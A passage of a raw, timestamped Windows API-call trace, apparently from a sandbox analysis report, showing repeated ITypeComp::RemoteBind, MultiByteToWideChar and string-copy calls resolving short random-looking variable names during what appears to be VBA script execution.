pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x228) returned 0x0 [0060.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48526be, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="uxCLeY") returned 7 [0060.021] ITypeComp:RemoteBind (in: This=0x87ce668, szName="uxCLeY", lHashVal=0x10ff19, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x228 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x228) returned 0x0 [0060.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48526be, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="uxCLeY") returned 7 [0060.021] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="uxCLeY", lHashVal=0x10ff19, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x228 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x228) returned 0x0 [0060.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48526be, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="uxCLeY") returned 7 [0060.022] ITypeComp:RemoteBind (in: This=0x87cef08, szName="uxCLeY", lHashVal=0x10ff19, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x228 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x228) returned 0x0 [0060.022] CRetailMalloc_Alloc () returned 0x87fc410 [0060.022] _mbscpy_s (in: _Dst=0x87fc410, _DstSizeInBytes=0x7, _Src=0x48526be | out: _Dst=0x87fc410) returned 0x0 [0060.023] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5701026, cbMultiByte=14, lpWideCharStr=0x347614, cchWideChar=15 | out: lpWideCharStr="_B_var_uxCLeY") returned 14 [0060.023] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_uxCLeY", lHashVal=0x107983, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.023] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x48526be | out: _Dst=0x34767c) returned 0x0 [0060.023] CRetailMalloc_Realloc () returned 0x61b8688 [0060.023] CRetailMalloc_Free () returned 0x6410301 [0060.023] ITypeComp:RemoteBind (in: This=0x87ce890, szName="zn9Fp6Ru", lHashVal=0x101c97, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x22a | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x22a) returned 0x0 [0060.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48526e2, cbMultiByte=9, lpWideCharStr=0x347604, cchWideChar=10 | out: lpWideCharStr="zn9Fp6Ru") returned 9 [0060.024] ITypeComp:RemoteBind (in: This=0x87ce668, szName="zn9Fp6Ru", lHashVal=0x101c97, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x22a | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x22a) returned 0x0 [0060.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48526e2, cbMultiByte=9, lpWideCharStr=0x347604, cchWideChar=10 | out: lpWideCharStr="zn9Fp6Ru") returned 9 [0060.024] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="zn9Fp6Ru", lHashVal=0x101c97, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x22a | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x22a) returned 0x0 [0060.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48526e2, cbMultiByte=9, lpWideCharStr=0x347604, cchWideChar=10 | out: lpWideCharStr="zn9Fp6Ru") returned 9 [0060.024] ITypeComp:RemoteBind (in: This=0x87cef08, szName="zn9Fp6Ru", lHashVal=0x101c97, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x22a | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x22a) returned 0x0 [0060.025] CRetailMalloc_Realloc () returned 0x889e630 [0060.025] CRetailMalloc_Alloc () returned 0x87fc410 [0060.025] _mbscpy_s (in: _Dst=0x87fc410, _DstSizeInBytes=0x9, _Src=0x48526e2 | out: _Dst=0x87fc410) returned 0x0 [0060.025] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5701052, cbMultiByte=16, lpWideCharStr=0x347614, cchWideChar=17 | out: lpWideCharStr="_B_var_zn9Fp6Ru") returned 16 [0060.025] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_zn9Fp6Ru", lHashVal=0x10f45f, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.026] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x48526e2 | out: _Dst=0x34767c) returned 0x0 [0060.026] CRetailMalloc_Free () returned 0x6410301 [0060.026] ITypeComp:RemoteBind (in: This=0x87ce890, szName="BiTLJ", lHashVal=0x103c83, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x22e | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x22e) returned 0x0 [0060.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x485272e, cbMultiByte=6, lpWideCharStr=0x347604, cchWideChar=7 | out: lpWideCharStr="BiTLJ") returned 6 [0060.026] ITypeComp:RemoteBind (in: This=0x87ce668, szName="BiTLJ", lHashVal=0x103c83, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x22e | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x22e) returned 0x0 [0060.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x485272e, cbMultiByte=6, lpWideCharStr=0x347604, cchWideChar=7 | out: lpWideCharStr="BiTLJ") returned 6 [0060.026] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="BiTLJ", lHashVal=0x103c83, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x22e | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x22e) returned 0x0 [0060.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x485272e, cbMultiByte=6, lpWideCharStr=0x347604, cchWideChar=7 | out: lpWideCharStr="BiTLJ") returned 6 [0060.027] ITypeComp:RemoteBind (in: This=0x87cef08, szName="BiTLJ", lHashVal=0x103c83, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x22e | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x22e) returned 0x0 [0060.027] CRetailMalloc_Alloc () returned 0x87fc410 [0060.027] _mbscpy_s (in: _Dst=0x87fc410, _DstSizeInBytes=0x6, _Src=0x485272e | out: _Dst=0x87fc410) returned 0x0 [0060.028] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x570107e, cbMultiByte=13, lpWideCharStr=0x347614, cchWideChar=14 | out: lpWideCharStr="_B_var_BiTLJ") returned 13 [0060.028] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_BiTLJ", lHashVal=0x100070, wFlags=0x3, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.028] CRetailMalloc_Realloc () returned 0x87163e0 [0060.028] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x485272e | out: _Dst=0x34767c) returned 0x0 [0060.028] CRetailMalloc_Free () returned 0x6410301 [0060.028] ITypeComp:RemoteBind (in: This=0x87ce890, szName="iyGr7", lHashVal=0x10394d, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x22c | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x22c) returned 0x0 [0060.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x485270a, cbMultiByte=6, lpWideCharStr=0x347604, cchWideChar=7 | out: lpWideCharStr="iyGr7") returned 6 [0060.028] ITypeComp:RemoteBind (in: This=0x87ce668, szName="iyGr7", lHashVal=0x10394d, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x22c | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x22c) returned 0x0 [0060.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x485270a, cbMultiByte=6, lpWideCharStr=0x347604, cchWideChar=7 | out: lpWideCharStr="iyGr7") returned 6 [0060.029] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="iyGr7", lHashVal=0x10394d, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x22c | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x22c) returned 0x0 [0060.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x485270a, cbMultiByte=6, lpWideCharStr=0x347604, cchWideChar=7 | out: lpWideCharStr="iyGr7") returned 6 [0060.029] ITypeComp:RemoteBind (in: This=0x87cef08, szName="iyGr7", lHashVal=0x10394d, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x22c | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x22c) returned 0x0 [0060.029] CRetailMalloc_Alloc () returned 0x87fc410 [0060.029] _mbscpy_s (in: _Dst=0x87fc410, _DstSizeInBytes=0x6, _Src=0x485270a | out: _Dst=0x87fc410) returned 0x0 [0060.030] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57010aa, cbMultiByte=13, lpWideCharStr=0x347614, cchWideChar=14 | out: lpWideCharStr="_B_var_iyGr7") returned 13 [0060.030] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_iyGr7", lHashVal=0x10fd79, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.030] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x485270a | out: _Dst=0x34767c) returned 0x0 [0060.030] CRetailMalloc_Free () returned 0x6410301 [0060.031] ITypeComp:RemoteBind (in: This=0x87ce890, szName="bjDXF", lHashVal=0x10ae88, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x230 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x230) returned 0x0 [0060.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852752, cbMultiByte=6, lpWideCharStr=0x347604, cchWideChar=7 | out: lpWideCharStr="bjDXF") returned 6 [0060.031] ITypeComp:RemoteBind (in: This=0x87ce668, szName="bjDXF", lHashVal=0x10ae88, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x230 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x230) returned 0x0 [0060.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852752, cbMultiByte=6, lpWideCharStr=0x347604, cchWideChar=7 | out: lpWideCharStr="bjDXF") returned 6 [0060.031] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="bjDXF", lHashVal=0x10ae88, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x230 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x230) returned 0x0 [0060.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852752, cbMultiByte=6, lpWideCharStr=0x347604, cchWideChar=7 | out: lpWideCharStr="bjDXF") returned 6 [0060.032] ITypeComp:RemoteBind (in: This=0x87cef08, szName="bjDXF", lHashVal=0x10ae88, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x230 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x230) returned 0x0 [0060.032] CRetailMalloc_Alloc () returned 0x87fc410 [0060.032] _mbscpy_s (in: _Dst=0x87fc410, _DstSizeInBytes=0x6, _Src=0x4852752 | out: _Dst=0x87fc410) returned 0x0 [0060.032] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57010d6, cbMultiByte=13, lpWideCharStr=0x347614, cchWideChar=14 | out: lpWideCharStr="_B_var_bjDXF") returned 13 [0060.032] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_bjDXF", lHashVal=0x107275, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.033] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x4852752 | out: _Dst=0x34767c) returned 0x0 [0060.033] CRetailMalloc_Free () returned 0x6410301 [0060.033] ITypeComp:RemoteBind (in: This=0x87ce890, szName="gYVaEoM", lHashVal=0x10d7c2, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x232 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x232) returned 0x0 [0060.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852776, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="gYVaEoM") returned 8 [0060.033] ITypeComp:RemoteBind (in: This=0x87ce668, szName="gYVaEoM", lHashVal=0x10d7c2, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x232 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x232) returned 0x0 [0060.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852776, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="gYVaEoM") returned 8 [0060.033] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="gYVaEoM", lHashVal=0x10d7c2, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x232 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x232) returned 0x0 [0060.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852776, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="gYVaEoM") returned 8 [0060.034] ITypeComp:RemoteBind (in: This=0x87cef08, szName="gYVaEoM", lHashVal=0x10d7c2, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x232 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x232) returned 0x0 [0060.034] CRetailMalloc_Realloc () returned 0x6210a88 [0060.034] CRetailMalloc_Alloc () returned 0x87fc410 [0060.034] _mbscpy_s (in: _Dst=0x87fc410, _DstSizeInBytes=0x8, _Src=0x4852776 | out: _Dst=0x87fc410) returned 0x0 [0060.035] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5701102, cbMultiByte=15, lpWideCharStr=0x347614, cchWideChar=16 | out: lpWideCharStr="_B_var_gYVaEoM") returned 15 [0060.035] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_gYVaEoM", lHashVal=0x10cbc5, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.035] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x4852776 | out: _Dst=0x34767c) returned 0x0 [0060.035] CRetailMalloc_Free () returned 0x6410301 [0060.035] ITypeComp:RemoteBind (in: This=0x87ce890, szName="mwnt1uL", lHashVal=0x100fce, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x234 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x234) returned 0x0 [0060.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x485279a, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="mwnt1uL") returned 8 [0060.035] ITypeComp:RemoteBind (in: This=0x87ce668, szName="mwnt1uL", lHashVal=0x100fce, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x234 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x234) returned 0x0 [0060.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x485279a, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="mwnt1uL") returned 8 [0060.036] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="mwnt1uL", lHashVal=0x100fce, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x234 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x234) returned 0x0 [0060.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x485279a, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="mwnt1uL") returned 8 [0060.036] ITypeComp:RemoteBind (in: This=0x87cef08, szName="mwnt1uL", lHashVal=0x100fce, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x234 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x234) returned 0x0 [0060.036] CRetailMalloc_Alloc () returned 0x87fc410 [0060.036] _mbscpy_s (in: _Dst=0x87fc410, _DstSizeInBytes=0x8, _Src=0x485279a | out: _Dst=0x87fc410) returned 0x0 [0060.037] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x570112e, cbMultiByte=15, lpWideCharStr=0x347614, cchWideChar=16 | out: lpWideCharStr="_B_var_mwnt1uL") returned 15 [0060.037] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_mwnt1uL", lHashVal=0x101352, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.037] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x485279a | out: _Dst=0x34767c) returned 0x0 [0060.037] CRetailMalloc_Free () returned 0x6410301 [0060.038] ITypeComp:RemoteBind (in: This=0x87ce890, szName="xIeAbZ", lHashVal=0x10066f, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x236 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x236) returned 0x0 [0060.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48527be, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="xIeAbZ") returned 7 [0060.038] ITypeComp:RemoteBind (in: This=0x87ce668, szName="xIeAbZ", lHashVal=0x10066f, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x236 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x236) returned 0x0 [0060.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48527be, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="xIeAbZ") returned 7 [0060.038] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="xIeAbZ", lHashVal=0x10066f, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x236 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x236) returned 0x0 [0060.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48527be, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="xIeAbZ") returned 7 [0060.039] ITypeComp:RemoteBind (in: This=0x87cef08, szName="xIeAbZ", lHashVal=0x10066f, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x236 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x236) returned 0x0 [0060.039] CRetailMalloc_Alloc () returned 0x87fc410 [0060.039] _mbscpy_s (in: _Dst=0x87fc410, _DstSizeInBytes=0x7, _Src=0x48527be | out: _Dst=0x87fc410) returned 0x0 [0060.039] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.040] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x570115a, cbMultiByte=14, lpWideCharStr=0x347614, cchWideChar=15 | out: lpWideCharStr="_B_var_xIeAbZ") returned 14 [0060.040] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_xIeAbZ", lHashVal=0x108118, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.040] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x48527be | out: _Dst=0x34767c) returned 0x0 [0060.040] 